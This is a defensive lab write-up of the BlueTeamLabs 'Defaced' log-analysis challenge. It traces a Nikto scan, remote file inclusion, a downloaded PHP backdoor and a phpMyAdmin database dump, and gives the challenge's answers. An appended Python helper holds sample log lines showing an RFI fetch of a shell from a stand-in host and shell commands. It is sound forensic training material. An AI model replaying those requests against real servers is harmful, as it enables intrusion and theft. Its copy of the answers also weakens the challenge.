BlueTeamLabs: Defaced

Overview

In this challenge, we’ve been tasked with analyzing Apache logs to uncover what an attacker did before defacing the victim’s website. We’re given access to an ELK instance to perform our investigation.


Scenario

Mike is a young entrepreneur that recently started a pharmaceutical company online that supplies personal health products. As the business is growing at a rapid pace, Mike pressured the developers to create a website as quickly as possible and disregarded time-consuming security measures. Unsurprisingly, after the website went live it was defaced by a threat actor that also stole all the database records. Learning from this incident, Mike took down the server and began security testing and investigation. He set up a forwarder to send server logs to a SIEM and used a file integrity monitoring solution to get alerts when files are modified on the server. You are provided with the alerts generated from the file integrity monitoring tool, stored on the Desktop as FIM1.JPG and FIM2.JPG. You also have screenshots of the website homepage before and after the compromise, saved as Before.JPG and After.JPG.


Q1

As an analyst, you need to submit details to the CTI team. What is the signature left by the threat actor that compromised the website?

We’ve been provided with screenshots of the site before and after it was defaced.

The defaced webpage features the threat actor’s signature.

Defaced webpage

Answer Team ApashKirikiri2.0

Q2

The attacker deleted some files. What are they? (Alphabetical order based on filename)

Aside from the screenshots of the website, we’ve also been provided with screenshots of the FIM (File Integrity Monitor).

Checking these screenshots we can see the two files that were deleted.

FIM screenshot

Answer access_log, error_log

Q3

What is the scanner used by the attacker to identify the vulnerability?

Our briefing instructed us to frame our hunt between the dates of Feb 17th and Feb 19th, 2021, so we’ll start by restricting events to be within this timeframe.

Filtering for the date range

We’re looking for attacker activity so we’ll begin by analyzing POST requests for any suspicious activity.

Sorting events from oldest to newest helps us to get a clear picture of the activities performed by the attacker.

After scrolling through a little bit of noise we can see what appears to be the attacker’s first attempt at testing for vulnerabilities.

attacker seen testing for xss

This doesn’t tell us what tool the attacker is using though, so we’ll drop our POST request filter and start looking at more data.

Unfortunately, our logs don’t include User-Agents, which makes identifying the tool a bit more complicated.

We can start by searching for well-known tools in the data to see if we get lucky.

There don’t seem to be any results for Nmap, but Nikto pops up 50 hits.

Searching for requests containing the string 'nikto'

Answer Nikto

Q4

Which PHP page is vulnerable to Remote File Inclusion (RFI)?

To look for an RFI attack we expect to find a full URL inside the request, since the vulnerable page fetches whatever location the attacker supplies in a parameter.

To filter for this we’ll search for any requests that contain https.

Filtering for requests that contain https

Unfortunately, so far our results are not what we’re looking for. Most of these results aren’t RFI attempts at all.

We can filter further for successful responses (response code 200) or scroll through the results.

Evidence of RFI

Answer getimagesonly.php

Q5

What is the IP address of the remote attacker? (3 points)

We discovered this in Q3 when we found evidence of XSS testing.

Answer 91.192.103.35

Q6

What is the name of the PHP shell?

We’ll adjust our filter now for the endpoint that is vulnerable to RFI (getimagesonly).

After adjusting our query it becomes clear that the attacker downloaded a shell from mediafire.com.

backdoor downloaded via RFI

Answer backdoor.jpg.php

Q7

The attacker downloaded the PHP shell from a file-hosting website. What is the name of the website?

We discovered this in the previous question.

Answer mediafire.com

Q8

What time was the first command executed through the PHP shell? (3 points)

Again we’ll adjust our query, this time we will filter for requests to the backdoor file.

requests to the backdoor file

Note: The answer expected is not the timestamp of the log entry but rather the timestamp within the message field of the log.

Answer 18/02/2021 17:12:44

Q9

Which config file does the attacker attempt to read using the command ‘cat’?

We can keep our existing filters and read through the various commands executed by the attacker.

Shortly after running the command in Q8, we can see the attacker read the passwd file, ran pwd, and enumerated /opt/lampp/htdocs before reading a config file with cat.

Initial command execution

Answer /opt/lampp/htdocs/MikePharmaSystem/config.php

Q10

At what time was the database dumped by the attacker?

The database doesn’t seem to be dumped via the backdoor, so we’ll remove that from our filters.

We’ll also adjust our timeframe to anything after the backdoor was uploaded (or thereabouts).

Adjusting the timeframe of our investigation

Scrolling through the results we can see the attacker accessed phpmyadmin, which is often targeted by attackers.

Shortly after accessing phpmyadmin, we see a reference to phpmyadmin/db_structure.php, and, not long after that, we see the attacker access db_export.php.

attacker making a request to db_export.php

Answer 18/02/2021 17:14:59

Q11

The attacker exfiltrated the database records. What is the database name? (Just the name, without any extension)

We can see the name of the database in the query discussed in the previous question.

Answer Mike_Pharmaceuticals
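To make the hunt above reproducible outside Kibana, here is an added example (my own code, not part of the original writeup or the BlueTeamLabs challenge) that runs the same checks from Q3 through Q11 over a few constructed Apache log lines: the scanner-name search, the full-URL-in-parameter test for RFI narrowed to 200 responses, requests to the dropped shell, and phpMyAdmin export requests. The sample lines, IPs and hostnames are constructed and are not the challenge's ELK data.

```python
import re
from urllib.parse import urlparse, parse_qs
# Constructed Apache common-log lines (made-up IPs/hosts, not the challenge's real ELK data).
SAMPLE_LOG = """\
198.51.100.7 - - [18/Feb/2021:17:03:12 +0000] "GET /nikto-test.html HTTP/1.1" 404 203
198.51.100.7 - - [18/Feb/2021:17:03:13 +0000] "GET /cgi-bin/nikto.cgi HTTP/1.1" 404 203
203.0.113.5 - - [18/Feb/2021:17:04:00 +0000] "GET /page.php?ref=https://example.invalid/ HTTP/1.1" 404 203
198.51.100.7 - - [18/Feb/2021:17:10:30 +0000] "GET /getimagesonly.php?img=https://files.example.invalid/x/backdoor.jpg.php HTTP/1.1" 200 512
198.51.100.7 - - [18/Feb/2021:17:12:44 +0000] "GET /backdoor.jpg.php?cmd=id HTTP/1.1" 200 88
198.51.100.7 - - [18/Feb/2021:17:14:59 +0000] "POST /phpmyadmin/db_export.php?db=Mike_Pharmaceuticals HTTP/1.1" 200 4096
"""
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

def parse_log(text):
    """Parse each line into a dict with the path split from its decoded query parameters."""
    events = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        e = m.groupdict()
        url = urlparse(e["target"])
        e["file"], e["params"], e["status"] = url.path, parse_qs(url.query), int(e["status"])
        events.append(e)
    return events

def scanner_hits(events, tool):
    """Count requests per source IP whose target names a known scanner (the Q3 search)."""
    counts = {}
    for e in events:
        if tool in e["target"].lower():
            counts[e["ip"]] = counts.get(e["ip"], 0) + 1
    return counts

def rfi_hits(events):
    """Successful requests carrying a full URL in a parameter (Q4/Q6/Q7): (ip, page, host, file)."""
    hits = []
    for e in events:
        for v in (v for vals in e["params"].values() for v in vals):
            if e["status"] == 200 and v.lower().startswith(("http://", "https://")):
                remote = urlparse(v)
                hits.append((e["ip"], e["file"].lstrip("/"), remote.netloc, remote.path.rsplit("/", 1)[-1]))
    return hits

def shell_commands(events, shell):
    """Requests to the dropped shell in log order (Q8/Q9): (timestamp, query parameters)."""
    return [(e["ts"], e["params"]) for e in events if e["file"].lstrip("/") == shell]

def db_exports(events):
    """phpMyAdmin export requests (Q10/Q11): (timestamp, database name)."""
    return [(e["ts"], e["params"].get("db", [""])[0]) for e in events if e["file"].endswith("/db_export.php")]
```

The 404 request with a URL in its `ref` parameter is deliberately included to show why the page narrows the `https` search to 200 responses.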